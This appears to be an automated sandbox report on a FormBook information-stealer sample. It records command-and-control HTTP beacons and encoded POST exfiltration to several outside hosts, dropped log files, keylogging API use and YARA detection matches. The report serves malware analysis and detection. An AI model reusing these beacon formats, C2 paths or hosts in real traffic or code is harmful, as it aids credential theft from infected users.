          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.turismoplayas.comConnection: closeContent-Length: 184586Cache-Control: no-cacheOrigin: http://www.turismoplayas.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.turismoplayas.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 54 46 4b 66 65 30 46 63 42 7a 37 4d 61 37 68 37 72 52 72 63 46 68 78 79 61 46 34 4f 55 44 48 54 49 78 77 68 45 48 38 54 77 43 55 42 53 51 73 71 58 38 32 74 48 62 69 4f 67 36 47 4d 77 70 7a 4c 35 5a 61 46 6b 6a 70 32 68 79 36 6a 49 6f 53 35 32 58 69 4b 4f 2d 70 45 4d 38 79 35 63 34 62 6b 34 6e 75 56 4f 6f 73 75 4b 34 50 68 41 49 31 61 57 6c 77 59 44 4b 43 4f 59 33 6f 2d 70 49 4b 37 30 4f 66 31 79 4d 66 6a 39 46 48 52 58 55 68 4f 4e 7a 65 4d 7a 45 61 6a 44 6c 58 52 53 34 4e 76 32 35 46 57 68 45 70 50 6d 51 55 75 4b 37 33 58 5a 41 64 52 44 58 66 78 71 58 58 34 74 66 30 30 76 35 48 34 70 6b 79 35 32 74 77 57 6e 36 34 52 4b 71 38 30 45 58 6c 74 4c 61 57 72 6b 47 75 2d 39 4b 70 6d 44 6f 44 37 6c 6f 64 49 4f 61 67 6a 50 4e 47 39 53 36 66 75 4d 6e 4a 61 53 63 47 4c 5a 76 41 53 35 38 64 35 4f 78 56 6a 35 52 34 72 62 38 4b 4a 4d 6c 4b 4a 44 6c 35 41 38 47 73 51 4b 53 48 65 4f 72 30 2d 55 62 46 36 66 4a 48 47 6e 46 79 56 75 6e 78 36 52 31 69 52 46 59 6e 78 62 75 72 70 63 42 63 32 4d 33 50 70 6c 56 4c 55 63 6b 67 7a 36 6c 73 6e 69 5f 74 71 48 2d 48 5f 62 61 47 62 35 57 33 6b 57 5f 6c 51 70 6b 64 4f 4d 46 76 54 69 37 39 37 64 5a 69 57 54 5a 48 58 56 42 49 4b 34 5f 69 59 59 6d 4f 52 50 5f 71 50 48 66 6f 33 57 75 61 41 42 58 75 49 41 2d 4d 77 52 43 72 38 42 57 76 45 52 4f 36 41 31 32 6a 49 71 34 69 41 51 32 31 56 54 37 64 4f 61 34 57 6e 79 54 7a 4d 4e 33 61 74 44 48 39 50 61 52 6a 72 6a 4a 4b 33 63 36 4d 74 4e 79 4f 6f 4a 5a 6a 37 6f 37 51 77 44 48 34 35 4e 61 46 35 46 7a 4e 30 4a 65 64 72 72 62 54 34 6e 65 59 53 69 63 68 74 76 68 66 33 69 5a 38 6a 77 2d 44 37 54 77 44 2d 57 56 70 49 7e 41 34 4d 47 6c 65 4b 75 36 39 44 57 69 6b 7a 39 6e 4f 6e 34 48 52 7a 71 4d 59 47 70 36 38 74 6e 33 67 61 30 5a 28 66 28 63 78 70 65 37 74 4b 42 38 41 71 6d 6d 46 4e 43 39 59 5f 68 43 75 44 34 63 62 4e 42 44 4c 31 45 36 30 4c 5a 47 67 39 64 54 6f 53 76 75 69 55 61 64 34 2d 6d 46 77 6b 6d 4e 4b 71 36 4d 43 73 7a 62 6b 37 79 6b 5a 61 53 44 78 49 44 42 5a 4a 5a 6f 72 34 45 73 47 47 36 63 6a 51 56 4a 57 69 62 31 49 78 39 67 41 72 57 32 69 38 56 49 45 54 39 78 7e 6d 53 6e 47 62 77 42 35 79 59 41 5a 43 58 49 6b 6a 6c 56 47 6c 65 79 49 66 32 51 46 30 76 61 46 57 6c 52 50 53 64 48 57 51 44 65 28 61 36 6f 35 50 37 74 71 76 57 43 4b 4f 49 75 76 51 66 4c 50 77 62 68 4e 71 42 65 59 57 59 66 31 49 55 4b 35 6a 54 62 6f 7a 71 6d 45 5a 6b 31 56 48 46 5a 70 61 48 4f 39 51 41 72 30 6e 35 31 51 4b 48 31 42 71 70 47 42 33 50 43 5a 59 73 67 68 34 54 55 7a 63 38 50 72 6e 77 67 68 4a 47 79 55 4b 6c 42 28 75 45 75 52 78 68 52 33 68 69 77 62 76 44 62 48 57 76 69 47 34
          Source: global trafficHTTP traffic detected: GET /3nk4/?RZBd8HzP=bIh+1viU3kJZwlU1+bF7NiTuEsJvwz9W2axQZvl/sJKd/5qF7f1dSILuagTiNZjEdxJz&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1Host: www.trulex.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /3nk4/?RZBd8HzP=w0UEi+V/ezucUh8SDyYF/+zgRqcIqbOC7nP1ZKE/fBP38eRJlYPULz8xC7zNwysHBq0j&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1Host: www.reignsponsibly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /3nk4/?RZBd8HzP=bnGlARlxAxXJaK863FaqbUduOQZZdXfDbBghBWs+/ncmCRg0ePvqNMTvjJHXk6PE1an+&2dqLWV=hpyPnldh-tYHIZfP HTTP/1.1Host: www.turismoplayas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fainlywatchdog.com
          Source: unknownHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.reignsponsibly.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.reignsponsibly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reignsponsibly.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 52 5a 42 64 38 48 7a 50 3d 34 57 59 2d 38 62 5a 39 58 44 69 67 4b 68 73 54 5a 53 46 47 67 34 28 4e 58 4c 73 5f 72 6f 36 35 74 44 4f 4f 64 36 42 70 59 31 76 39 38 4e 35 59 6c 4c 4f 5f 4a 6c 74 50 65 34 28 43 6f 6a 78 75 4f 59 55 6d 43 65 69 72 45 4f 4b 51 6c 58 4c 44 6e 50 66 52 78 5f 6d 74 59 45 74 7a 70 54 51 32 54 31 4f 4d 63 50 6e 72 6c 33 52 44 69 42 45 79 52 77 69 6e 58 68 4d 4b 32 7a 72 43 68 71 30 4c 63 46 4b 74 31 5f 75 4b 36 68 33 49 74 35 6a 64 47 4b 56 71 51 52 78 4b 39 6c 75 42 78 46 74 31 7a 54 59 33 68 36 4b 6a 5a 55 73 73 64 30 37 43 64 73 31 42 7a 79 6f 55 46 34 5a 38 48 50 79 56 6a 49 4e 35 75 43 65 78 54 48 66 6c 44 2d 6d 56 7a 47 28 59 32 64 36 75 31 41 5a 65 4d 64 6a 64 68 41 37 58 32 57 6a 51 7a 4c 4f 35 64 48 69 52 62 35 39 51 49 4c 71 6e 5a 57 79 75 35 4d 72 39 77 57 6c 49 35 4e 38 6a 58 66 47 58 42 69 53 70 4d 65 64 51 42 4a 6d 4c 74 30 58 67 5a 39 35 79 6b 4f 47 71 65 59 52 77 63 4f 57 79 6a 39 59 6e 64 35 57 4f 49 6e 7e 69 4c 47 75 49 31 4a 6a 32 38 5a 62 39 49 43 35 41 69 57 37 5f 46 75 7a 59 6f 4b 65 38 73 36 54 33 69 36 64 58 57 4b 57 4c 79 73 64 53 57 39 41 78 39 64 7a 76 63 46 59 54 51 75 4a 50 4c 5f 62 44 47 58 30 79 4b 6c 49 61 62 4c 5a 65 77 50 4e 69 4b 31 36 5f 31 4c 39 31 55 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: RZBd8HzP=4WY-8bZ9XDigKhsTZSFGg4(NXLs_ro65tDOOd6BpY1v98N5YlLO_JltPe4(CojxuOYUmCeirEOKQlXLDnPfRx_mtYEtzpTQ2T1OMcPnrl3RDiBEyRwinXhMK2zrChq0LcFKt1_uK6h3It5jdGKVqQRxK9luBxFt1zTY3h6KjZUssd07Cds1BzyoUF4Z8HPyVjIN5uCexTHflD-mVzG(Y2d6u1AZeMdjdhA7X2WjQzLO5dHiRb59QILqnZWyu5Mr9wWlI5N8jXfGXBiSpMedQBJmLt0XgZ95ykOGqeYRwcOWyj9Ynd5WOIn~iLGuI1Jj28Zb9IC5AiW7_FuzYoKe8s6T3i6dXWKWLysdSW9Ax9dzvcFYTQuJPL_bDGX0yKlIabLZewPNiK16_1L91Ug).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Sep 2020 10:08:49 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6b 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nk4/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: svchost.exe, 00000003.00000002.467866629.00000000036A9000.00000004.00000001.sdmpString found in binary or memory: http://www.turismoplayas.com
          Source: svchost.exe, 00000003.00000002.467866629.00000000036A9000.00000004.00000001.sdmpString found in binary or memory: http://www.turismoplayas.com/3nk4/
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.214170948.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: svchost.exe, 00000003.00000002.464277981.0000000000436000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: svchost.exe, 00000003.00000002.464277981.0000000000436000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2;
          Source: svchost.exe, 00000003.00000002.465432256.0000000002A38000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
          Source: svchost.exe, 00000003.00000002.464179041.0000000000419000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: svchost.exe, 00000003.00000003.373140432.0000000005A00000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_004308B4 GetKeyboardState,0_2_004308B4

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000001.431070703.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.432596553.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.465450197.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
